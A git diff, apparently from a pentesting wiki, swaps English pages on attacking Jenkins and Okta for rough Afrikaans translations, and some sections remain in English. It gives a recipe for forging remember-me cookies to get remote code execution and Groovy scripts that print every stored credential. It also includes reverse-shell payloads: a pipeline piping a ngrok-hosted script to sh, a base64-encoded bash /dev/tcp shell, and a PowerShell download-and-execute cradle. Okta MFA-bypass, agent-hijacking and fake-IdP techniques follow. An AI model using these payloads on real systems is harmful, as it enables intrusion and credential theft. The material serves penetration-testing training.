+Dit is 'n KI-gegenereerde opsomming van die deel van die pos waar die vervaardiging van 'n arbitrêre koekie misbruik word om RCE te verkry deur 'n plaaslike lêer te lees totdat ek tyd het om 'n opsomming op my eie te skep:
 
-### Attack Prerequisites
+### Aanval Voorvereistes
 
-- **Feature Requirement:** "Remember me" must be enabled (default setting).
-- **Access Levels:** Attacker needs Overall/Read permissions.
-- **Secret Access:** Ability to read both binary and textual content from key files.
+- **Kenmerk Vereiste:** "Remember me" moet geaktiveer wees (standaardinstelling).
+- **Toegangsvlakke:** Aanvaller benodig Algemene/Lees regte.
+- **Geheime Toegang:** Vermoë om beide binêre en teksinhoud van sleutel lêers te lees.
 
-### Detailed Exploitation Process
+### Gedetailleerde Exploitasiestap
 
-#### Step 1: Data Collection
+#### Stap 1: Data Versameling
 
-**User Information Retrieval**
+**Gebruiker Inligting Herwinning**
 
-- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
-  - **Username**
-  - **User seed**
-  - **Timestamp**
-  - **Password hash**
+- Toegang tot gebruiker konfigurasie en geheime van `$JENKINS_HOME/users/*.xml` vir elke gebruiker om te versamel:
+- **Gebruikersnaam**
+- **Gebruiker saad**
+- **Tydstempel**
+- **Wagwoord hash**
 
-**Secret Key Extraction**
+**Geheime Sleutel Uittrekking**
 
-- Extract cryptographic keys used for signing the cookie:
-  - **Secret Key:** `$JENKINS_HOME/secret.key`
-  - **Master Key:** `$JENKINS_HOME/secrets/master.key`
-  - **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
+- Trek kriptografiese sleutels uit wat gebruik word om die koekie te teken:
+- **Geheime Sleutel:** `$JENKINS_HOME/secret.key`
+- **Meester Sleutel:** `$JENKINS_HOME/secrets/master.key`
+- **MAC Sleutel Lêer:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
 
-#### Step 2: Cookie Forging
+#### Stap 2: Koekie Vervalsing
 
-**Token Preparation**
+**Token Voorbereiding**
 
-- **Calculate Token Expiry Time:**
+- **Bereken Token Vervaldatum:**
 
-  ```javascript
-  tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
-  ```
+```javascript
+tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Voeg een uur by die huidige tyd
+```
 
-- **Concatenate Data for Token:**
+- **Konkateer Data vir Token:**
 
-  ```javascript
-  token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
-  ```
+```javascript
+token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
+```
 
-**MAC Key Decryption**
+**MAC Sleutel Ontsleuteling**
 
-- **Decrypt MAC Key File:**
+- **Ontsleutel MAC Sleutel Lêer:**
 
-  ```javascript
-  key = toAes128Key(masterKey)  // Convert master key to AES128 key format
-  decrypted = AES.decrypt(macFile, key)  // Decrypt the .mac file
-  if not decrypted.hasSuffix("::::MAGIC::::")
-      return ERROR;
-  macKey = decrypted.withoutSuffix("::::MAGIC::::")
-  ```
+```javascript
+key = toAes128Key(masterKey)  // Convert meester sleutel na AES128 sleutel formaat
+decrypted = AES.decrypt(macFile, key)  // Ontsleutel die .mac lêer
+if not decrypted.hasSuffix("::::MAGIC::::")
+return ERROR;
+macKey = decrypted.withoutSuffix("::::MAGIC::::")
+```
 
-**Signature Computation**
+**Handtekening Berekening**
 
-- **Compute HMAC SHA256:**
+- **Bereken HMAC SHA256:**
 
-  ```javascript
-  mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key
-  tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
-  ```
+```javascript
+mac = HmacSHA256(token, macKey) // Bereken HMAC met die token en MAC sleutel
+tokenSignature = bytesToHexString(mac) // Convert die MAC na 'n hexadesimale string
+```
 
-**Cookie Encoding**
+**Koekie Kodering**
 
-- **Generate Final Cookie:**
+- **Genereer Finale Koekie:**
 
-  ```javascript
-  cookie = base64.encode(
-    username + ":" + tokenExpiryTime + ":" + tokenSignature
-  ) // Base64 encode the cookie data
-  ```
+```javascript
+cookie = base64.encode(
+username + ":" + tokenExpiryTime + ":" + tokenSignature
+) // Base64 kodeer die koekie data
+```
 
-#### Step 3: Code Execution
+#### Stap 3: Kode Uitvoering
 
-**Session Authentication**
+**Sessie Verifikasie**
 
-- **Fetch CSRF and Session Tokens:**
-  - Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
-  - Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
+- **Haal CSRF en Sessie Tokens:**
+- Maak 'n versoek na `/crumbIssuer/api/json` om `Jenkins-Crumb` te verkry.
+- Vang `JSESSIONID` uit die antwoord, wat saam met die remember-me koekie gebruik sal word.
 
-**Command Execution Request**
+**Opdrag Uitvoeringsversoek**
 
-- **Send a POST Request with Groovy Script:**
+- **Stuur 'n POST Versoek met Groovy Skrip:**
 
-  ```bash
-  curl -X POST "$JENKINS_URL/scriptText" \
-  --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
-  --header "Jenkins-Crumb: $CRUMB" \
-  --header "Content-Type: application/x-www-form-urlencoded" \
-  --data-urlencode "script=$SCRIPT"
-  ```
+```bash
+curl -X POST "$JENKINS_URL/scriptText" \
+--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
+--header "Jenkins-Crumb: $CRUMB" \
+--header "Content-Type: application/x-www-form-urlencoded" \
+--data-urlencode "script=$SCRIPT"
+```
 
-  - Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
+- Groovy skrip kan gebruik word om stelselniveau opdragte of ander operasies binne die Jenkins omgewing uit te voer.
 
-The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
+Die voorbeeld curl opdrag wat verskaf word demonstreer hoe om 'n versoek aan Jenkins te maak met die nodige koptekste en koekies om arbitrêre kode veilig uit te voer.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
index 8699b8159..9bce99040 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
@@ -3,10 +3,9 @@
 {{#include ../../banners/hacktricks-training.md}}
 
 > [!WARNING]
-> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
-
-You can **dump all the secrets from the Groovy Script console** in `/script` running this code
+> Let daarop dat hierdie skripte slegs die geheime binne die `credentials.xml`-lêer sal lys, maar **boukonfigurasielêers** mag ook **meer kredensiale** hê.
 
+Jy kan **alle geheime uit die Groovy Script-konsol** in `/script` dump deur hierdie kode te loop
 ```java
 // From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
 import jenkins.model.*
@@ -42,52 +41,45 @@ showRow("something else", it.id, '', '', '')
 
 return
 ```
-
-#### or this one:
-
+#### of hierdie een:
 ```java
 import java.nio.charset.StandardCharsets;
 def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
-      com.cloudbees.plugins.credentials.Credentials.class
+com.cloudbees.plugins.credentials.Credentials.class
 )
 
 for (c in creds) {
-  println(c.id)
-  if (c.properties.description) {
-    println("   description: " + c.description)
-  }
-  if (c.properties.username) {
-    println("   username: " + c.username)
-  }
-  if (c.properties.password) {
-    println("   password: " + c.password)
-  }
-  if (c.properties.passphrase) {
-    println("   passphrase: " + c.passphrase)
-  }
-  if (c.properties.secret) {
-    println("   secret: " + c.secret)
-  }
-  if (c.properties.secretBytes) {
-    println("    secretBytes: ")
-    println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
-    println("")
-  }
-  if (c.properties.privateKeySource) {
-    println("   privateKey: " + c.getPrivateKey())
-  }
-  if (c.properties.apiToken) {
-    println("   apiToken: " + c.apiToken)
-  }
-  if (c.properties.token) {
-    println("   token: " + c.token)
-  }
-  println("")
+println(c.id)
+if (c.properties.description) {
+println("   description: " + c.description)
+}
+if (c.properties.username) {
+println("   username: " + c.username)
+}
+if (c.properties.password) {
+println("   password: " + c.password)
+}
+if (c.properties.passphrase) {
+println("   passphrase: " + c.passphrase)
+}
+if (c.properties.secret) {
+println("   secret: " + c.secret)
+}
+if (c.properties.secretBytes) {
+println("    secretBytes: ")
+println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
+println("")
+}
+if (c.properties.privateKeySource) {
+println("   privateKey: " + c.getPrivateKey())
+}
+if (c.properties.apiToken) {
+println("   apiToken: " + c.apiToken)
+}
+if (c.properties.token) {
+println("   token: " + c.token)
+}
+println("")
 }
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
index 89ca15223..dc89eeb70 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
@@ -2,42 +2,36 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Creating a new Pipeline
+## Skep 'n nuwe Pyplyn
 
-In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
+In "Nuwe Item" (toeganklik in `/view/all/newJob`) kies **Pyplyn:**
 
 ![](<../../images/image (235).png>)
 
-In the **Pipeline section** write the **reverse shell**:
+In die **Pyplyn afdeling** skryf die **reverse shell**:
 
 ![](<../../images/image (285).png>)
-
 ```groovy
 pipeline {
-    agent any
+agent any
 
-    stages {
-        stage('Hello') {
-            steps {
-                sh '''
-                    curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
-                '''
-            }
-        }
-    }
+stages {
+stage('Hello') {
+steps {
+sh '''
+curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
+'''
+}
+}
+}
 }
 ```
-
 Finally click on **Save**, and **Build Now** and the pipeline will be executed:
 
 ![](<../../images/image (228).png>)
 
 ## Modifying a Pipeline
 
-If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
+As jy toegang het tot die konfigurasie-lêer van 'n sekere geconfigureerde pyplyn, kan jy dit eenvoudig **wysig deur jou omgekeerde skulp by te voeg** en dit dan uitvoer of wag totdat dit uitgevoer word.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
index f16096070..9c20b0d5b 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
@@ -4,37 +4,33 @@
 
 ## Creating a Project
 
-This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
+Hierdie metode is baie luidrugtig omdat jy 'n heel nuwe projek moet skep (duidelik sal dit net werk as jou gebruiker toegelaat word om 'n nuwe projek te skep).
 
-1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
-2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
-3. Click **Build now**
-   1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
-   2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl <username>:<api_token>@<jenkins_url>/job/<job_name>/build?token=<api_token_name>`**
+1. **Skep 'n nuwe projek** (Freestyle project) deur op "New Item" te klik of in `/view/all/newJob`
+2. Binne die **Build** afdeling stel **Execute shell** in en plak 'n powershell Empire launcher of 'n meterpreter powershell (kan verkry word met _unicorn_). Begin die payload met _PowerShell.exe_ in plaas van _powershell._
+3. Klik op **Build now**
+1. As die **Build now** knoppie nie verskyn nie, kan jy steeds na **configure** --> **Build Triggers** --> `Build periodically` gaan en 'n cron van `* * * * *` stel
+2. In plaas van om cron te gebruik, kan jy die konfigurasie "**Trigger builds remotely**" gebruik waar jy net die api token naam moet stel om die taak te aktiveer. Gaan dan na jou gebruikersprofiel en **genereer 'n API token** (noem hierdie API token soos jy die api token genoem het om die taak te aktiveer). Laastens, aktiveer die taak met: **`curl <username>:<api_token>@<jenkins_url>/job/<job_name>/build?token=<api_token_name>`**
 
 ![](<../../images/image (165).png>)
 
 ## Modifying a Project
 
-Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
+Gaan na die projekte en kyk **of jy enige** daarvan kan konfigureer (soek na die "Configure button"):
 
 ![](<../../images/image (265).png>)
 
-If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
+As jy **nie** enige **konfigurasie** **knoppie** kan sien nie, dan kan jy waarskynlik **nie** dit **konfigureer** nie (maar kyk na al die projekte aangesien jy dalk sommige daarvan kan konfigureer en nie ander nie).
 
-Or **try to access to the path** `/job/<proj-name>/configure` or `/me/my-views/view/all/job/<proj-name>/configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
+Of **probeer om toegang te verkry tot die pad** `/job/<proj-name>/configure` of `/me/my-views/view/all/job/<proj-name>/configure` \_\_ in elke projek (voorbeeld: `/job/Project0/configure` of `/me/my-views/view/all/job/Project0/configure`).
 
 ## Execution
 
-If you are allowed to configure the project you can **make it execute commands when a build is successful**:
+As jy toegelaat word om die projek te konfigureer, kan jy **maak dat dit opdragte uitvoer wanneer 'n bou suksesvol is**:
 
 ![](<../../images/image (98).png>)
 
-Click on **Save** and **build** the project and your **command will be executed**.\
-If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
+Klik op **Save** en **bou** die projek en jou **opdrag sal uitgevoer word**.\
+As jy nie 'n reverse shell uitvoer nie, maar 'n eenvoudige opdrag, kan jy **die uitvoer van die opdrag binne die uitvoer van die bou sien**.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
index 33821cc03..5b9747e7d 100644
--- a/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
+++ b/src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
@@ -1,27 +1,24 @@
-# Jenkins RCE with Groovy Script
+# Jenkins RCE met Groovy Skrip
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Jenkins RCE with Groovy Script
+## Jenkins RCE met Groovy Skrip
 
-This is less noisy than creating a new project in Jenkins
-
-1. Go to _path_jenkins/script_
-2. Inside the text box introduce the script
+Dit is minder luidrugtig as om 'n nuwe projek in Jenkins te skep
 
+1. Gaan na _path_jenkins/script_
+2. Binne die tekskas stel die skrip voor
 ```python
 def process = "PowerShell.exe <WHATEVER>".execute()
 println "Found text ${process.text}"
 ```
+U kan 'n opdrag uitvoer met: `cmd.exe /c dir`
 
-You could execute a command using: `cmd.exe /c dir`
+In **linux** kan jy doen: **`"ls /".execute().text`**
 
-In **linux** you can do: **`"ls /".execute().text`**
-
-If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
-
-**Another useful groovy script** is (replace \[INSERT COMMAND]):
+As jy _aanhalings_ en _enkele aanhalings_ binne die teks moet gebruik. Jy kan _"""PAYLOAD"""_ (drie dubbele aanhalings) gebruik om die payload uit te voer.
 
+**Nog 'n nuttige groovy script** is (vervang \[INSERT COMMAND]):
 ```python
 def sout = new StringBuffer(), serr = new StringBuffer()
 def proc = '[INSERT COMMAND]'.execute()
@@ -29,9 +26,7 @@ proc.consumeProcessOutput(sout, serr)
 proc.waitForOrKill(1000)
 println "out> $sout err> $serr"
 ```
-
-### Reverse shell in linux
-
+### Omgekeerde skulp in linux
 ```python
 def sout = new StringBuffer(), serr = new StringBuffer()
 def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
@@ -39,29 +34,20 @@ proc.consumeProcessOutput(sout, serr)
 proc.waitForOrKill(1000)
 println "out> $sout err> $serr"
 ```
-
 ### Reverse shell in windows
 
-You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
-
+Jy kan 'n HTTP-bediener met 'n PS reverse shell voorberei en Jeking gebruik om dit af te laai en uit te voer:
 ```python
 scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
 echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
 cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
 ```
-
 ### Script
 
-You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
-
-You can use MSF to get a reverse shell:
+Jy kan hierdie proses outomatiseer met [**hierdie skrip**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
 
+Jy kan MSF gebruik om 'n omgekeerde shell te kry:
 ```
 msf> use exploit/multi/http/jenkins_script_console
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/okta-security/README.md b/src/pentesting-ci-cd/okta-security/README.md
index e682996c2..6a52b1520 100644
--- a/src/pentesting-ci-cd/okta-security/README.md
+++ b/src/pentesting-ci-cd/okta-security/README.md
@@ -4,60 +4,60 @@
 
 ## Basic Information
 
-[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
+[Okta, Inc.](https://www.okta.com/) word erken in die identiteit en toegang bestuur sektor vir sy wolk-gebaseerde sagteware oplossings. Hierdie oplossings is ontwerp om gebruikersverifikasie oor verskeie moderne toepassings te stroomlyn en te beveilig. Hulle is nie net gerig op maatskappye wat hul sensitiewe data wil beskerm nie, maar ook op ontwikkelaars wat belangstel om identiteitsbeheer in toepassings, webdienste en toestelle te integreer.
 
-The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
+Die vlaggies aanbod van Okta is die **Okta Identity Cloud**. Hierdie platform sluit 'n suite van produkte in, insluitend maar nie beperk tot nie:
 
-- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
-- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
-- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
-- **Universal Directory**: Enables centralized management of users, groups, and devices.
-- **API Access Management**: Secures and manages access to APIs.
+- **Single Sign-On (SSO)**: Vereenvoudig gebruikers toegang deur een stel aanmeldbesonderhede oor verskeie toepassings toe te laat.
+- **Multi-Factor Authentication (MFA)**: Versterk sekuriteit deur verskeie vorme van verifikasie te vereis.
+- **Lifecycle Management**: Automatiseer die skepping, opdatering en deaktivering van gebruikersrekeninge.
+- **Universal Directory**: Maak sentrale bestuur van gebruikers, groepe en toestelle moontlik.
+- **API Access Management**: Beveilig en bestuur toegang tot API's.
 
-These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
+Hierdie dienste het as doel om dataprotectie te versterk en gebruikers toegang te stroomlyn, wat beide sekuriteit en gerief verbeter. Die veelsydigheid van Okta se oplossings maak dit 'n gewilde keuse oor verskeie industrieë, voordelig vir groot ondernemings, klein maatskappye en individuele ontwikkelaars. Soos van die laaste opdatering in September 2021, word Okta erken as 'n prominente entiteit in die Identiteit en Toegang Bestuur (IAM) arena.
 
 > [!CAUTION]
-> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**.
+> Die hoofdoel van Okta is om toegang tot verskillende gebruikers en groepe tot eksterne toepassings te konfigureer. As jy daarin slaag om **administrateur regte in 'n Okta** omgewing te **kompromitteer**, sal jy hoogs waarskynlik in staat wees om **alle ander platforms wat die maatskappy gebruik te kompromitteer**.
 
 > [!TIP]
-> To perform a security review of an Okta environment you should ask for **administrator read-only access**.
+> Om 'n sekuriteitsherziening van 'n Okta omgewing uit te voer, moet jy vra vir **administrateur lees-slegs toegang**.
 
 ### Summary
 
-There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\
-These users can be inside **groups**.\
-There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...
+Daar is **gebruikers** (wat kan wees **gestoor in Okta,** ingelogde van geconfigureerde **Identiteitsverskaffers** of geverifieer via **Active Directory** of LDAP).\
+Hierdie gebruikers kan binne **groepe** wees.\
+Daar is ook **verifikators**: verskillende opsies om te verifieer soos wagwoord, en verskeie 2FA soos WebAuthn, e-pos, telefoon, okta verify (hulle kan geaktiveer of gedeaktiveer wees)...
 
-Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
+Dan is daar **toepassings** wat met Okta gesinkroniseer is. Elke toepassing sal 'n paar **kaarte met Okta** hê om inligting te deel (soos e-pos adresse, voorname...). Boonop moet elke toepassing binne 'n **Verifikasiebeleid** wees, wat die **nodige verifikators** aandui vir 'n gebruiker om die toepassing te **benader**.
 
 > [!CAUTION]
-> The most powerful role is **Super Administrator**.
+> Die mees kragtige rol is **Super Administrator**.
 >
-> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
+> As 'n aanvaller Okta met Administrateur toegang kompromitteer, sal al die **toepassings wat Okta vertrou** hoogs waarskynlik **gekompromitteer** wees.
 
 ## Attacks
 
 ### Locating Okta Portal
 
-Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**.
+Gewoonlik sal die portaal van 'n maatskappy geleë wees in **companyname.okta.com**. As dit nie so is nie, probeer eenvoudige **variaties** van **companyname.** As jy dit nie kan vind nie, is dit ook moontlik dat die organisasie 'n **CNAME** rekord het soos **`okta.companyname.com`** wat na die **Okta portaal** wys.
 
 ### Login in Okta via Kerberos
 
-If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard.
+As **`companyname.kerberos.okta.com`** aktief is, **word Kerberos gebruik vir Okta toegang**, wat tipies **MFA** vir **Windows** gebruikers omseil. Om Kerberos-geverifieerde Okta gebruikers in AD te vind, voer **`getST.py`** uit met **geskikte parameters**. Nadat jy 'n **AD gebruikerskaart** verkry het, **injekteer** dit in 'n beheerde gasheer met behulp van gereedskap soos Rubeus of Mimikatz, en verseker dat **`clientname.kerberos.okta.com` in die Internet Opsies "Intranet" sone is**. Toegang tot 'n spesifieke URL moet 'n JSON "OK" antwoord teruggee, wat die aanvaarding van die Kerberos kaart aandui, en toegang tot die Okta dashboard verleen.
 
-Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta.
+Die kompromitering van die **Okta diensrekening met die delegasie SPN stel 'n Silver Ticket aanval in staat.** egter, Okta se gebruik van **AES** vir kaartversleuteling vereis dat die AES-sleutel of platte wagwoord besit word. Gebruik **`ticketer.py` om 'n kaart vir die slagoffer gebruiker te genereer** en lewer dit via die blaaiert om met Okta te verifieer.
 
 **Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
 
 ### Hijacking Okta AD Agent
 
-This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key').
+Hierdie tegniek behels **toegang tot die Okta AD Agent op 'n bediener**, wat **gebruikers sinkroniseer en verifikasie hanteer**. Deur konfigurasies in **`OktaAgentService.exe.config`** te ondersoek en te ontsleutel, veral die AgentToken met behulp van **DPAPI**, kan 'n aanvaller potensieel **verifikasiedata onderskep en manipuleer**. Dit stel nie net in staat om **te monitor** en **gebruikers se akrediteer in platte teks** tydens die Okta verifikasie proses nie, maar ook om **te reageer op verifikasie pogings**, wat ongeoorloofde toegang moontlik maak of universele verifikasie deur Okta bied (soos 'n 'skelet sleutel').
 
 **Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
 
 ### Hijacking AD As an Admin
 
-This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment.
+Hierdie tegniek behels die kaping van 'n Okta AD Agent deur eers 'n OAuth Code te verkry, en dan 'n API-token aan te vra. Die token is geassosieer met 'n AD domein, en 'n **connector word genoem om 'n vals AD agent te vestig**. Inisialiserings laat die agent toe om **verifikasie pogings te verwerk**, wat akrediteer via die Okta API vasvang. Outomatiseringsgereedskap is beskikbaar om hierdie proses te stroomlyn, wat 'n naatlose metode bied om verifikasiedata binne die Okta omgewing te onderskep en te hanteer.
 
 **Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
 
@@ -65,42 +65,42 @@ This technique involves hijacking an Okta AD Agent by first obtaining an OAuth C
 
 **Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
 
-The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner.
+Die tegniek behels **die ontplooiing van 'n vals SAML verskaffer**. Deur 'n eksterne Identiteitsverskaffer (IdP) binne Okta se raamwerk te integreer met 'n bevoorregte rekening, kan aanvallers **die IdP beheer, enige verifikasie versoek na willekeur goedkeur**. Die proses behels die opstelling van 'n SAML 2.0 IdP in Okta, die manipulasie van die IdP Single Sign-On URL vir omleiding via die plaaslike gashere lêer, die generering van 'n self-ondertekende sertifikaat, en die konfigurasie van Okta instellings om teen die gebruikersnaam of e-pos te pas. Die suksesvolle uitvoering van hierdie stappe maak verifikasie as enige Okta gebruiker moontlik, wat die behoefte aan individuele gebruikers akrediteer omseil, wat toegangbeheer in 'n potensieel onopgemerkte manier aansienlik verhoog.
 
 ### Phishing Okta Portal with Evilgnix
 
-In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal.
+In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) word verduidelik hoe om 'n phishing veldtog teen 'n Okta portaal voor te berei.
 
 ### Colleague Impersonation Attack
 
-The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**.
+Die **kenmerke wat elke gebruiker kan hê en wysig** (soos e-pos of voornaam) kan in Okta geconfigureer word. As 'n **toepassing** **vertrou** as ID 'n **kenmerk** wat die gebruiker kan **wysig**, sal hy in staat wees om **ander gebruikers in daardie platform na te doen**.
 
-Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change).
